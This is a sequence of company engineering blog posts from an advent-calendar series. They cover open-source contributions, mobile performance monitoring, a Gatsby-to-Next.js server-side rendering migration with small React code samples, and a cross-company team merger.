With the core functionalities in place, we didn’t stop there. We wanted to go above and beyond to provide the best user experience possible. One of our bold ideas was to allow users to publish any version of a page. Why limit them to only the latest saved changes? By giving users the freedom to publish any version, they can experiment and save their work without any worries. But we didn’t stop at publishing options. We also wanted to empower users to create new pages based on previous versions. This way, they can easily move their work as templates and make edits as needed. This feature is currently under development and will be available to users soon!

Lastly, we want to enhance the user experience by adding a description field. This field will provide information such as the page from which the current version was cloned, the parent version from which the current version is copied, and more. This additional context will make navigation between versions even more seamless.

And there you have it! Our journey to enhance concurrent editing and reliability in our page editor tool. We didn’t settle for the basics; instead, we pushed ourselves to implement additional features and provide the best user experience possible. Stay tuned for the upcoming releases, as we continue to innovate and improve our tool!

TL;DR

Version history is a feature built to provide the best UX to the users.
It basically saves the instances of the page and keeps them as versions.
This ensures that any user’s work is never lost!
Being able to store the journey of a page, helped in bringing additional features such as publishing any of the versions, and cloning any versions(like using templates), etc.

And this brings us to the end of this article. We sincerely thank you for taking out your time and reading till the end. Hope you enjoyed it! Feel free to reach out to us if you want to have a chat.

The Spirit of Giving: A Year-End Roundup of Our Open Source Contributions

Tue, 05 Dec 2023 11:00:06 GMT

This post is for Day 5 of Mercari Advent Calendar 2023, brought to you by @adbutterfield from the Mercari Web Architect Team.

Hello, everyone! As winter rolls in with its festive cheer, and we’re all buzzing with the holiday spirit, here at Mercari, we’re unwrapping our own unique kind of presents: our open source contributions.

Let’s think of open source like the world’s biggest potluck dinner, where we’re all bringing a dish, a tweak, even just a pinch of salt to the table. That’s the beauty of this community – every contribution, no matter how small, adds flavor, fixes a bug, or makes a software run a bit smoother. And just like when you bake cookies to share at a holiday party, these little acts of giving warm up this grand techno-feast!

This is exactly what we’ve loved doing this past year: adding our ingredients to the open source potluck. Our recent journey taught us that sometimes, it’s the little things, the small acts of giving, that truly matter.

As part of our delightful December Advent Calendar series, get ready for a fun-filled trip down memory lane, uncovering the nuggets of code we’ve shared, the tech-tangles we’ve solved, and the big difference our seemingly small contributions have made in the amazing world of open source.

Eluding ESlint Hiccups with SSR-friendly Contributions: eslint-plugin-ssr-friendly

Contribution: https://github.com/kopiro/eslint-plugin-ssr-friendly/releases/tag/v1.3.0

You know the saying: "It takes a village to raise a child"? Well, we like to think of our coding community as a village, brainstorming, debugging, and enhancing open source "offspring" to help them reach their full potential. One such prodigy that we’ve nurtured is the existing eslint-plugin-ssr-friendly.

A hitch we bumped into was a bug pestering us about using browser globals on an SSR application. The eslint-plugin-ssr-friendly was good at catching the wrongdoers, but there were a couple of crafty bugs it didn’t recognize. So, we thought, "Time to upgrade this plugin, make it even better!"

We decided to trial it by intentionally throwing in some violations to see if the plugin would identify them. Lo and behold, a couple of these violators didn’t get detected! We created a few issues and dialed down into the source code to fix ’em up ourselves. And let’s be honest, having never modified an eslint plugin before, it felt like solving a puzzle in zero-gravity.

A little disoriented, but unfazed, we teamed up with our secure, internal coding elf, aka ChatGPT, to crack this nut. With her guidance, we navigated through the testing framework, added the missing rules, and like the hero in a holiday movie, saved the day!

Now, our improved eslint-plugin-ssr-friendly is ready to serve not just us, but the entire JS community with even fewer SSR-bug-related headaches. It’s like we’ve added more holiday lights to it, illuminating the path for everyone, and most importantly, keeping the spirit of community giving alive!

Daring Detours with Detox – Enhancing Accessibility Actions: Detox

Contribution: https://github.com/wix/Detox/releases/tag/20.8.0

Here’s another tale from the tech trenches. Our adventures this time led us to wrestle with e2e tests on our app using Detox. Now, don’t get us wrong – Detox is a great tool, but we found ourselves wanting just a touch extra – a way to conduct accessibility actions within the app. This missing trick in the Detox playbook made it challenging to fully test our snazzy AttributedString components and overall accessibility.

So, what do we do when we encounter a bump on the tech road? Strap ourselves in for a learning curve rollercoaster! Diving deep into the machinery of Detox, understanding its idiosyncrasies across mobile platforms, we were like video game characters figuring out the hidden rules for a bonus level.

After several rounds of brainstorming, coding, and caffeinating, we managed to score the winning goal. We added the performAccessibilityAction action to the Detox API. This was like finding the missing piece of a jigsaw puzzle, enabling us now to execute accessibility actions on both iOS and Android within React Native.

With this fun addition to Detox, it feels like we just leveled up! Not just for us, but for everyone out there using Detox for e2e tests. Proof that no contribution is ever too small in the open source universe. Here’s to making the tech world more accessible, one code upgrade at a time!

Bolstering Babel with Enhanced Language Compatibility: babel-plugin-i18next-extract

Contribution: https://github.com/gilbsgilbs/babel-plugin-i18next-extract/releases/tag/releases%2F0.9.1

Imagine you’re gearing up for a major global tour (or in our world, adding an additional supported language). You’ve packed your bags, revised your itineraries, hired a competent tour guide (or in our language, relied on babel-plugin-i18next-extract to juggle with the translation keys). You’re all set to explore, when boom! You find out your "passport" is invalid – your perfectly acceptable lang-region format tag causes the command line interface to give a bewildering error – Unknown locale ‘en-US’.

Time to put on our detective hats again!

We discovered that the culprit, Intl.PluralRules.prototype.resolvedOptions(), wasn’t recognizing the correct locale. It was like someone trying to navigate New York using a map of London. For example, for en-US or en-UK, it was only giving us back en, causing our program to throw an error since en is definitely not equal to en-US or en-UK. All this happened despite the Intl specification clearly stating that the returned locale should match the BCP 47 language tag, and not chop off the region part.

Interestingly, we found different environments, like chromium based browsers, Firefox, even Node, gave differing outputs when we ran it with Intl.PluralRules.prototype.resolvedOptions(). Thought you were just adding languages? Welcome to the world of tech, where you encounter a whole new city of mysteries!

Our approach to fixing it was simple: just check if the tour pass (en-US) included the map (en). We came up with a solid workaround, but here’s hoping that Señor Intl will fix its GPS soon and align the formats for a smoother ride. Until then, our solution is out there, brightening the babel-plugin-i18next-extract landscape, and making sure that more languages and places get visited without a hitch. Another tiny gift in the open source chronicles!

Bringing More Sparkle to Ky – Making HTTP Client More Robust: ky

Contribution: https://github.com/sindresorhus/ky/pull/533

Let’s ring in another tech story, this time starring the simple yet powerful HTTP client Ky. We hopped on the Ky bandwagon when migrating to a fetch based HTTP system for web apps, thrilled that fetch was finally stable in Node 21+! But the excitement was tinged with a bit of blue when we realized Ky could do with a little tinkering.

In the heart of Mercari, there’s a golden rule when it comes to our services: Every failed HTTP request must get a second chance, with retries using exponential backoff plus jitter. But alas! Our new friend Ky didn’t come with a built-in jitter for its retry delays.

Just like a perfectly sized gift wrap that falls short by an inch, Ky seemed to be missing that final tug to make it the perfect fit for us.

But, as you may have guessed, at Mercari, we’re all about coding, coffee, and most importantly – turning curves into solutions! So, I dusted off my keyboard and opened a PR to boost Ky with a custom delay function.

And voila! Just like that, I added a shot of jitter to Ky, making it a perfect blend for our needs – just like adding a splash of marshmallow to hot cocoa! So now, not just us, but the entire Ky family can enjoy jitter-backed retry delays with our spruced up version. A true testament to the holiday spirit of gifting that resonates in the open-source community!

Powering Up pkgx – Strengthening ‘engines’ for npm Versioning: pkgx

Contribution: https://github.com/pkgxdev/pkgx/pull/807

Ever got a long-awaited gift and discovered it needed a little tweaking before it was perfect? That was the case when we got our hands on the new tool, pkgx. This promising promise-saver was supposed to smooth out the hassle of constantly updating the node and npm versions as we moved between repositories. It felt like it was about to be a lifesaver… or so we thought.

We noticed that pkgx, although impressive, wasn’t quite hitting the spot when it came to reliably fetching the right versions from the package.json file. It was as if our brand new automated toy train was missing a tiny gear, preventing it from gliding flawlessly on the tracks; pkgx didn’t quite mesh well with our company’s use of "engines" to define the node/npm version.

But in the spirit of problem-solving (and perfect gift-making), we rolled up our sleeves and got down to nitty-gritty. We took our little automated toy train (pkgx), fixed the missing gear, and soon enough it was speeding down the coding rails like a charm. By revamping pkgx to jive with our systems, it became a much more effective helper in its quest to detect and install the correct npm version for each node upgrade.

Now, the rejigged pkgx chugs along doing its task for not just us, but every coder in the pkgx community. Our small tweak – much like a tiny gear in a toy train – has helped fuel smoother rides through the terrain of coding and open source. After all, every improvement, no matter how tiny, counts!

Sprucing Up SQLFluff – Fixing Parameter Name Problems: sqlfluff

Contribution: https://github.com/sqlfluff/sqlfluff/releases/tag/2.3.2

Let’s dive into another one of our tech journeys, this time featuring a detour with sqlfluff. At Mercari, we have a cozy relationship with sqlfluff, especially when we want to nudge our SQL code for a quick sanity check. But like that one pesky bulb in a string of fairy lights, we noticed a feature that wasn’t shining as bright – handling parameters in SQL.

Now, in a perfect world, we would simply mention all parameter names in the sqlfluff config. Easy, right? Well, imagine having to dart around, updating multiple fields every time you introduce a new parameter. A bit like having to re-decorate your entire Christmas tree because you added a new ornament! Definitely an unwelcome chore.

So, feeling a tad more Grinch-like, we set out to solve the issue. Our goal: to make sqlfluff work smarter, not harder, by bypassing the need to manually add each parameter name.

And guess what? We weren’t the only ones who stumbled upon this issue – multiple others in the community encountered the same pothole. But hey, challenges are just opportunities in disguise! After observing the behavior across different environments and solving a delightful array of mini-mysteries, we managed to crack the code.

Our solution was like a nifty new ornament hook, making it easier for everyone to hang new baubles (or parameters, in our case)! Now, sqlfluff users can jingle all the way to smoother coding, thanks to this neat trick up our sleeves. It’s a small yet impactful gift to the sqlfluff community, and a sweet reminder that the spirit of giving can turn problems into presents!

Wrapping Up: Reflecting on a Year of Open Source Generosity

And there we have it, folks! We’ve reached the end of the trail on our open source journey for the year. What a ride it’s been! From glitches to shiny patches, our adventure helped us realize countless ways how even the littlest contributions can make a big wave in the enormous pond of open source.

Nothing screams holiday spirit more than being part of this techy potluck, each dev bringing their unique dish – a line of code, a bug fix, or an idea – we’re all in it together, adding our own spark of flavor. But just as that last chocolate in the advent calendar doesn’t mark the end of treats, our journey in contributing to open source definitely doesn’t stop here. Next year, we’ll take off on yet another journey, ready to face new challenges, ready to bring more to the potluck.

So, here’s to everyone who was part of this awe-inspiring potluck of open source. To each and every giver, to each and every solution, regardless of size. To you.

As we’re wrapping up another year, let’s remember to keep the spirit of sharing, connecting, and helping with us not just during the holiday season but throughout the year. After all, if there’s one thing our open source journey has reinforced, it’s that together, we can create significant change. Happy Holidays!

Performance monitoring in Mercari mobile apps

Mon, 04 Dec 2023 11:00:28 GMT

This post is for Day 4 of Mercari Advent Calendar 2023, brought to you by @fp from the Mercari mobile architects team.

Last year when we launched our GroundUP project, we were facing a daunting challenge: serving millions of users equally or better than before, using different technologies and different architectures.

When launching a completely rewritten app, it should at least perform equal or better than the previous version.

The first period after launch, the priority is always to look after crashes, it’s a clear indication that something is not working.
But crashes are not the only issue to look after, sometimes a slow app can be even worse.
The app doesn’t crash, but it’s not meeting expectations for the customer, and this issue might go unnoticed for a long time.
Even when customers report bad performances, it is a common mistake to attribute it to external circumstances: bad connectivity or a device not meeting requirements for example.

We couldn’t accept that, we wanted to deliver the best experience to our customers, and that meant no crashes and good performances.
So we needed to measure it. Measure all we could.

This eventually led us where we are today: end-to-end tracing, performance drop alerts, performance monitoring dashboards.
Let’s get into the details on what we did to arrive where we are today.

The problem

Near the end of our GroundUP project development, we started beta testing the new app.
As expected, various issues emerged and the team focused on fixing crashes as well as addressing the feedback received from the beta-testers.
One kind of feedback we were receiving was about performances: some users were reporting the app to be slow, less responsive than the previous version.
While in some cases, the issues were noticeable and easy to reproduce, there were feedbacks we could not reproduce.
Due to the project using a different tech-stack and architecture, and due to the fact that we leveraged new technologies such as SwiftUI and Jetpack Compose, we were expecting some performance degradation.

After expanding the beta to more users, the situation did not improve, and we started to receive more feedback about performances; something had to be done.

Starting to measure performances

The first step we took toward improving performances was to measure the differences between the old app and the new app.
We identified 9 core business scenarios where it should be critical to have a performant and smooth experience, and manually measured the time it took to load them. A very rudimentary approach but simple and effective.
In some cases the differences were substantial: the old app was clearly faster.

We focused on improving performances, for the next few weeks, our engineers were able to optimize and improve the code.
Eventually the performances improved significantly, but it was still not as good as the old app, and this was not enough.

So we decided to tackle this issue from different sides:
In-house performance measuring and benchmarking: before every weekly release, performance measurements were taken and compared with previous results. If performances were not meeting our thresholds, the release would be blocked.
Production performance monitoring & alerting: to understand what our customers are experiencing and get notified if performances are not up to our expectations

This was the beginning of a long journey but allowed us to make a plan and focus on monitoring and improving performances, something that is now part of our development process.

In-house benchmarks

The first benchmarks were really just people using a timer and measuring the load time in various scenarios.
Clearly this was a temporary measure while we were developing tools to collect the measurements automatically.
We run this benchmark every week, before each release.
Initially, we were comparing the measures with the old app, and once performances started to align, we started to compare the results to the previous week one.
This was necessary to guarantee that no performance regressions would be introduced in the new release.
In case of performance spikes, we might decide to block the release.

Production performance monitoring

In-house benchmark was a great first step, but it wasn’t enough.
One of the downsides of In-house benchmarks is that they are executed in a controlled environment. While this is perfect for detecting regressions, it doesn’t reflect real-world experience.

Our goal was to be able to monitor performance in production, and measure everything that happens on the screen from API calls to rendering to animations.
We investigated different services that provide performance monitoring, and eventually we settled for Datadog RUM.
The main driver for this decision was the integration with the backend: since Datadog was already being used there, we could leverage it.

The integration with the backend allowed us to have a comprehensive view of the performance from client to server.
Having the ability to exactly pinpoint where the performance issue is, it’s an invaluable tool.

We were now able to understand and monitor user performances in production.
We implemented performance monitoring in our major screens and it allowed us to have a breakdown of all API calls, and understand where slow performances were coming from.
Is the screen rendering slow? Or maybe the client APIs are unresponsive and take a long time to return the data? What about our micro services? We can now check it all.

We started to set up dashboards, highlighting screen performances and creating a baseline.
From that baseline we started setting up alerts that alert us if performances are degrading.
It allows us to quickly jump on the issue and address it.

What’s next?

The next step is to set performance SLOs and target metrics. This will allow us to guarantee an optimal performance across all the screens.
There are also plans to increase the scenarios and metrics monitored, to have a better overview of production performance.
For Android specifically, automated baseline generation is in the pipeline.
Finally, improving the development flow by leveraging all these metrics, this is an ongoing process with the aim of continuously finding the best outcome.

Tomorrow’s article will be by @t-hiroi. Look forward to it!

How we reduced response latency by over 80%

Sun, 03 Dec 2023 11:00:26 GMT

This post is for Day 3 of Mercari Advent Calendar 2023, brought to you by @rclarey from the Mercari Web Architect team.

Today we’ll continue on the topic of how we migrated from our dynamic rendering service (using Google’s rendertron) to server-side rendering (SSR), this time addressing how we planned, executed, and evaluated the success of the migration on the frontend side. This migration was a huge undertaking that required collaboration from almost every web team, and I’ll discuss some of the bumps and unexpected difficulties we encountered along the way. In the end we achieved huge performance improvements, reducing response latency by roughly 80% in P50, P75, P90, and P95, which made all of our hard work along the way very much worth it.

If you haven’t already, you should read yesterday’s article by the Web Platform team which explains the infrastructure and FinOps side of this migration.

Why migrate?

We rewrote Mercari Web starting in 2019, and at the time we chose to implement the new “ground up web” as a client-side rendered Gatsby app. This allowed our infrastructure to be simple, and enabled us to focus on quickly building out and launching the new app. Since then however, we realized that the compromises we made to make our app accessible to search engine bots were no longer worth it, and that we should consider a different approach moving forward. For a more detailed history of Mercari Web you should check out this article: https://engineering.mercari.com/en/blog/entry/20220830-15d4e8480e/

Before deciding to do a big migration it’s important to make sure that the large amount of work required is justified, and that your current solution is truly not serving your needs. In our case there were two main reasons why we decided to migrate:

Our dynamic rendering service was expensive and slow
Google’s rendertron solution was deprecated, and dynamic rendering in general is no longer recommended as a long term solution

Previously, server-side rendering Mercari Web was considered blocked because our design system used web components, and at the time SSR solutions for web components were experimental and did not fully support our use case. However, we realized that in practice only React projects were using our design system, so it wasn’t worth continuing to use web components if it meant blocking our ability to do SSR. Combined with the two main reasons above, this reinforced our motivation to migrate to SSR.

Having decided to do the migration, what was next was to plan how we would actually go about it.

Deciding on a framework

When planning this migration we had two main alternatives in mind: use Gatsby’s newly released (at the time) SSR feature, or change frameworks to Next.js which is known for SSR. Staying with Gatsby was appealing because it would be easier to incrementally add SSR support to our existing codebase.

On the other hand Next.js was a much more mature solution for SSR, and it was already used in Mercari for other web projects, however it would require changing our framework first.

To fairly judge these two options we did a proof-of-concept implementation of our item page with both. In the end there were not many differences between implementing SSR with Gatsby or with Next, however because SSR was so new for Gatsby at the time there was a lack of documentation, and biggest of all it was not officially supported outside of Gatsby Cloud (which we would not use).

This convinced us that Next’s maturity as an SSR framework, and official support for self-hosting, would make it a better choice for us long term. Lastly, since Next 13’s app router was still in beta at the time, and we also weren’t using React 18 yet, we opted to migrate to Next 12 in order to keep the migration scope manageable.

Incremental development

Since our design system was built with web components, which were not well supported for server-side rendering, we also needed to migrate it to React alongside our migration to SSR. We wrote a dedicated article about the design system migration in last year’s Mercari Advent Calendar, so please check it out for more details: https://engineering.mercari.com/en/blog/entry/20221207-web-design-system-migrating-web-components-to-react/

To make the migration easier, and to achieve partial improvements quicker, we planned to do the migration incrementally wherever possible. The main area where we could deliver incrementally was by implementing and releasing SSR page-by-page instead of all at once.

To achieve the biggest improvements as soon as possible, we prioritized pages in order of the requests-per-second they receive. Since more complex pages like /item and /search were at the beginning of this list, this ordering had the added benefit of allowing us to identify early on most of the big issues we’d have during the migration.

Once we had the list of pages, we worked backwards and created batches of design system components, based on usage within the pages, that we could also migrate incrementally. For example, the first batch was all components relevant to SEO (i.e. not decorative) used on the highest priority page, the second batch was all components used on the next highest priority page, and so on. Thankfully the design system has contributors from outside of the web architect team, so they were able to work on migrating the design system batches in parallel to my team working on migrating to SSR.

Unfortunately the one place we couldn’t easily break up the work incrementally was changing from Gatsby to Next. Since there are several web teams all working on the same Mercari Web app it would be too disruptive to pause feature development so that we could gradually move from one framework to the other. This meant that we needed to do the migration from Gatsby to Next in a feature branch, then change over all at once when it was ready.

With a solid plan in place, and a proof-of-concept under our belt, all there was left to do is actually do the migration.

Going from Gatsby to Next

The first and largest step was to change from Gatsby to client-side rendering with Next. A lot of the APIs we used with Gatsby were actually from other companion packages, and luckily there were analogous Next APIs for almost all of the ones we used, for example:

pages/_app.tsx in Next is roughly the same as src/App.tsx and gatsby-browser.tsx in Gatsby
useRouter in Next is analogous to useLocation from Reach Router
next/dynamic is analogous to loadable-components
next/head is analogous to react-helmet

To handle changing to the Next version of all of these APIs across our thousands of source files we made heavy use of automated refactoring tools to do most of the tedious work. After making the changes we validated them first using type checking (thank you TypeScript), then our existing unit and UI tests, and finally with our E2E regression tests. This was able to catch the vast majority of bugs introduced by the changes.

The most apparent difference when moving to Next was the difference in routing paradigms. With Gatsby we used client-only routes with Reach Router, however Next uses file-system based routing. This difference turned out to be mostly superficial however, and it was simple enough to create a list of all pages then write a small script to generate the correct files Next expects under the pages directory.

The only other issue we had with file-system routing was that Next 12 does not as easily support different layouts for different subsets of routes, and we had a handful of these different layouts throughout our app. While Next 12 does support per-page layouts, those increase the amount of boilerplate code needed in page files and are prone to errors where developers forget to add the layout to new pages. We instead opted to implement a simple solution using a custom app that suited our needs:

function DomainLayout({ children }: { children: ReactNode }) {
  const { pathname } = useRouter();
  if (pathname.startsWith("/mypage")) {
    return <MypageLayout>{children}</MypageLayout>;
  }
  if (pathname.startsWith("/purchase")) {
    return <PurchaseLayout>{children}</PurchaseLayout>;
  }
  // and so on
}

export function CustomApp({ Component, /* ... */ }: AppProps) {
  return (
    <>
      {/* global layout things */}
      <DomainLayout>
        <Component />
      </DomainLayout>
    <>
  );
}

There were also several subtle differences between Next’s Link component and useRouter hook compared to the analogous Link component and useLocation hook from Reach Router. Most of these differences were either very particular to our codebase or trivial to fix, and so they are not really worth talking about. The one difference that I will mention is that useRouter().pathname is not what it sounds like, and it caused us repeated issues until we implemented our own version that does what we expect. For those unaware, the pathname field on the object returned from useRouter() is the current path without parameter placeholders substituted (i.e. /item/[itemId] instead of /item/m123456789).

The correct way to get the current path with parameters substituted is useRouter().asPath, however that has the downside of also including query parameters which we don’t often want. In the end we wrote a helper to do the thing we expect, and we actively discourage the use of useRouter().pathname directly.

export function useCurrentURL() {
  const { asPath } = useRouter();
  // NEXT_PUBLIC_SITE_URL is our SSR-safe equivalent to location.origin
  return new URL(asPath, process.env.NEXT_PUBLIC_SITE_URL);
}

The Big PR

Although most of the changes at this point were fairly trivial, they touched almost every file in our code base. To make it possible to do this migration in parallel with other team’s normal feature development, we leveraged automated tools as much as possible to do the bulk of the refactoring as quickly as possible. This was especially useful for catching and fixing new unmigrated code when we synced our feature branch with the main branch every few days.

When all of the refactoring was done, and we had our app fully working with Next, we collaborated with all of the other web teams to “freeze” our main branch for a few days so that we had time to do a final code review and very thorough testing. The review period kicked off with an online code review session to introduce developers to the high level API changes, and from there the responsibility to do code review and fix failing tests was delegated to individual teams based on code ownership.

Over the course of the next few days we identified several bugs either through code review or testing (both automated and manual), and slowly worked through fixing them all. After all the regression tests were passing, and all developers were convinced that the new Next app was working as expected, I clicked the merge button.

Of course we still had to release the change, and to do so we modified our usual staged release process to make the rollout happen in smaller increments over a longer period of time. Instead of the usual flow of 33% of sessions for 30 minutes → 100% of sessions, we doubled the number of stages and doubled the time at each stage, so it became 1% → 10% → 33% → 100% with 1 hour at each stage. This worked out well, and in the end we released the Next app without any major issues.

Implementing server-side rendering

With our app moved over to Next client-side rendering, the next step was to move over to server-side rendering. This stage of the migration was highly collaborative between three main teams:

The design system contributors, migrating the required components for a given page in preparation for that page’s migration to SSR
The web architect team, implementing server-side data fetching, error handling, and server-side monitoring
The web platform team, load testing newly migrated pages, updating infrastructure configurations as the SSR server began handling more load, and handling the CDN routing to move requests for a migrated page from the dynamic rendering service over to the new SSR service (again the web platform team’s article from yesterday covers this in more depth)

On the frontend side the biggest issue in this stage of the migration was finding and replacing usages of DOM APIs with SSR-safe replacements. These replacements generally fell into one of two categories:

APIs where we need some meaningful value during SSR, e.g. replacing location.origin with process.env.NEXT_PUBLIC_SITE_URL which we manually for each environment in .env files
APIs where we don’t need a value during SSR, e.g. interaction related APIs like ResizeObserver that don’t contribute to the server response

For the latter group, we implemented SSR-safe helpers for the window and document globals and introduced eslint-plugin-ssr-friendly to enforce those helpers were used instead of accessing the globals directly.

// TypeScript forces us to handle the `undefined` case that happens during SSR
function getWindow() {
  return typeof window !== "undefined" ? window : undefined;
}
function getDocument() {
  return typeof document !== "undefined" ? document : undefined;
}

Impact

Below are graphs of the P50, P75, P90, and P95 response latency for the dynamic render service just before we began the SSR migration, and the Next SSR service just after we moved 100% of requests to it.

Response latency for the dynamic rendering service

Response latency for the SSR service

I think the fact that the scale on the second graph is nearly an order of magnitude smaller than the first speaks for itself, but to also give some hard numbers:

P50 decreased 88%
P75 decreased 84%
P90 decreased 83%
P95 decreased 79%

Overall the migration project was a huge success in every measurable way, and I can’t give enough thanks to everybody who helped make it possible 💖

Conclusion

Looking back, the simplicity of a client-side rendered app helped us quickly build out and launch our rewrite of the web in 2019, however eventually we realized that architecture was no longer serving us well so we needed to move towards SSR instead. Focussing on migrating incrementally where possible, keeping the migration scope contained, and collaborating across teams as much as possible allowed this migration to be the success that it was.

While there were many expected and unexpected issues that arose during the migration, a healthy reliance on automated tools for refactoring, testing, linting, and type checking meant that we were able to confidently deliver the migration without any major incident.

Tomorrow’s article will be by @fp from the Mercari mobile architects team. Look forward to it!

Merging Teams for a Growth Platform

Sun, 03 Dec 2023 10:00:04 GMT

This post is for Day 3 of Merpay Advent Calendar 2023, brought to you by @keigoand from the Merpay Growth Platform Team.

Introduction

This post describes the transfer of an engineering team to a different business unit to join forces for a common Growth Platform and how that led to a positive outcome.

Some background in the decision-making process is shared, along with insights on its execution and how the close relationship with product managers and growth teams was an essential element for team engagement, the critical factor for any change.

If you are in a managerial role, whether or not you are involved in a similar reorg, this reading might be helpful.

Definitions

Some readers may not be familiar with the fact that Mercari and Merpay are different companies. They both belong to the same group, but since Merpay is in the financial business, it is subject to specific regulations to operate. For that same reason, engineering teams work separately, and their processes sometimes differ.

To distinguish between the Mercari company and the Mercari group, we will sometimes refer to the company as the Marketplace because that is their primary business. Similarly, we will occasionally refer to Merpay as Fintech.

Our platform supports Growth teams. They differ from Product teams because Growth teams do not improve the core product or add new features. At the same time, they differ from traditional Marketing because they strategically change the product to engage customers. They enhance the application’s design to achieve what the name suggests: Growth, not just for acquisition, but with a strong focus on retention.

Finally, despite the difference, we sometimes refer to some Growth members as marketers because they also use traditional marketing techniques.

Initial state

For this narrative, let’s go back to before the Growth Platform existed. I joined the Growth domain in the Marketplace around June 2022. The team consisted of backend and client engineers. Client here means Mobile and Web (Frontend). An additional backend team was set up in the newly founded India Office. English was the primary language.

The team was called "Marketing Operations," which reflected our self-perception. We felt that we were there to support marketers. Before, it was called CRM (Customer Relationship Management) because it was also part of the team’s scope. The team’s mission was under discussion.

In parallel, there was also a team at Merpay. They consisted of backend engineers and communicated mainly in Japanese. They collaborated directly with Growth teams to implement campaigns for Fintech products.

So, putting everything together in a picture, it looks like this, with the two large circles separated by company:

Marketplace and Merpay teams were focused on their organization’s growth strategy, but both had similar missions. They enabled growth teams to run campaigns in the app containing:

incentive/rewards: points, coupons, loyalty, discount/sales
communications: banners, modals, notifications (e-mail, push, etc.)

Having them doing the same things did not sound optimal, but it was at least justifiable from a business perspective.

Motivation

For a few years, both teams were dealing with a legacy tool that was causing many incidents and slowing down our progress on new features. Over time, we started a dialog to decide about the future of that tool.

All Engineering and Product members agreed it would be much better to sunset that tool altogether. We started to consider that as a common goal across companies. And since it impacted our results directly, our board requested our commitment to terminate that tool in favor of an alternative solution.

Having a common goal like that triggered meaningful conversations among Engineering Managers. We realized that our tasks were roughly 80% similar. Our teams had different approaches to the same things, but there was much to exchange. By applying the Inverse Conway Maneuver, if our teams could collaborate more with each other, we could avoid duplicated efforts, and consequently, our systems would become more integrated over time. Considering the team wasn’t too large for applying that strategy, it seemed feasible.

With shared interests and a good perspective, we decided to set up a cross-company task force.

The introduction of squads

We defined a few squads for the backend to start a structured collaboration with a common goal of sunsetting the legacy tool. Here, we casually use the term squad as a simple group of people for a particular task. In this case, we refer to members from different companies.

Our squads had a few important elements:

Report lines didn’t change: people reported to the same managers as before, even if they were working in different squads;
Autonomy: Each squad had its Scrum routines and boards. Some decided to operate with Kanban instead of Scrum;
Squads were temporary by design. Each quarter, we tried slightly different configurations.

Working in squads allowed us to disseminate knowledge across different teams, which was necessary for the mission to sunset the legacy tool.

In the first iterations, some changes were relatively large, impacting the entire squad scope, but progressively, the sub-domains became more evident, and the collaboration model settled down.

In other words, the cognitive load increased temporarily with the introduction of squads, but once the sub-domains became stable, engineers started having more focus.

The decision to merge

As time went by, managers from both companies held meetings to discuss how to improve the collaboration because we observed that keeping the current model with a few small squads would have only a minor impact in the long term. Even with a good alignment among product managers, each team still had its own agenda, highly influenced by their separate organizations.

The idea of transferring the entire team from one company to another and consolidating their mission and objectives, which we call a merge, appeared as an alternative. But choosing which team should move wasn’t trivial.

On the one hand, it would have been simple to merge them into the Marketplace, as there were more engineers there, and they communicated in English – which was not so common at Merpay. However, there were at least two factors that were of great relevance at the time of the decision to move all teams to Merpay / Fintech:

Regulation: financial rewards must be controlled, and Merpay has followed strict rules since it was created, which are required by law for their operation. It would be difficult to comply with those standards if the teams were moved to the Marketplace;
Product: Merpay was planning large campaigns to support new products, so the Growth teams had more projects. I’ll mention that again in the outcome section.

Going to Merpay meant we could collaborate more closely with the growth leadership. That proved to be an essential element later.

Planning phase

EMs asked each engineer of the Marketplace for their opinions about transferring to Merpay. We created a spreadsheet to collect and discuss their comments, ensuring everyone could say no.

Surprisingly, everyone was neutral or optimistic about the change! They agreed with the motivation factors discussed before, as we shared them transparently. Furthermore, the collaboration had already started, so it all felt like a natural next step.

Still, there was a lot of uncertainty and doubts, so we investigated them. A few company procedures were different, such as how to do an expense report. There were also a few bureaucratic steps involving the company change, but none seemed critical.

In hindsight, two factors were complicated:

Bringing the team in India to collaborate with Merpay, as it was the first team abroad
Approving additional QA capacity to adjust to the finance regulation requirements

The dialog and leadership support proved essential to resolve those issues.

We planned the team transfer to coincide with the beginning of the new calendar year. There was enough time to prepare additional documentation, schedule a kickoff meeting, and perform all the necessary HR changes.

Deploying changes

The mission and vision for every squad were clarified in the kick-off meeting. In brief, we were all about to build a growth platform to serve the two company verticals. Product managers provided many insights on what that meant; beyond sunsetting the legacy tools, we wanted to add new features, make our tools smarter, support other teams, and enable many important campaigns that depended on us.

So, all set and clear, we started rolling out changes. We consulted the team even for a few minor decisions, like restructuring our Slack channels and Jira projects.

While implementing changes, we realized that the most significant differences were in the engineering practices. Finance regulations influenced many processes, including QA, release, and incident handling. There were also a few deliberate choices that differed from the Marketplace teams, for instance, which libraries to use for e2e testing and the existence of middleware specific to Merpay.

Client engineers were slightly less impacted because the codebase was already the same across companies. On the other hand, backend engineers had to "bring their services" with them – changing their microservices’ ownership and doing an additional Production Readiness Check, a checklist containing additional verifications, for each of them. The Merpay team created excellent onboarding documentation supporting that transition.

Some engineers were going through an entirely new onboarding period, and it took us a few months until everyone was familiar with the Fintech processes. That period was a little bit tedious and sometimes confusing as we never seemed to reach an agreement. Still, the result was positive: the team improved at incident handling, was introduced to a reliable and dedicated QA team, and our releases became more trackable. Plus, several other positive side-effects started emerging that I want to emphasize later in this post.

Let me first share what our team looks like after one year.

Resulting structure

After many iterations, this is how the team’s work scope is defined. It is relatively easy to understand.

The backend comprises two areas, CRM and Incentive platforms, providing services for the group like "coupon as a service," "campaigns as a service," and so on. Client teams are cross-sectional teams that enhance our platform for other client teams in any company to consume.

Also, the team structure became straightforward:

It was nice to see the members stick together through the journey; a few new people joined, and the squads became more cohesive. We may consider transforming the backend squads into established teams and implementing report line changes soon.

Along the way, we collected some interesting data I want to share in the next section.

Squad Health Check

We’ve been applying a lightweight version of the Spotify Squad Health Check model to monitor the team’s engagement throughout the process. It is a self-assessment, but it provides important insights for managers of engineering teams.

The view above is just an aggregated version. Each squad ran separate health check sessions. In addition to the red/yellow/green scale, the team members shared their comments and points of view. The retrospective exercise by itself was worth it. It resembles a Scrum retrospective in many aspects but on a larger time scale.

I like that "Mission" has always been green, given all our efforts to clarify it.

Of course, there are many points to improve, as the charts indicate. Among them, the "Pawns or Players," the "Health of the Codebase," and the "Easy to Release" never recovered from Yellow – actually, it was sometimes Red. Reading through the comments, the connection between those items surfaced. We always deal with tight deadlines to launch campaigns, feeling like we have little control ("Pawns"), leading to technical debt and making new releases relatively tricky over time.

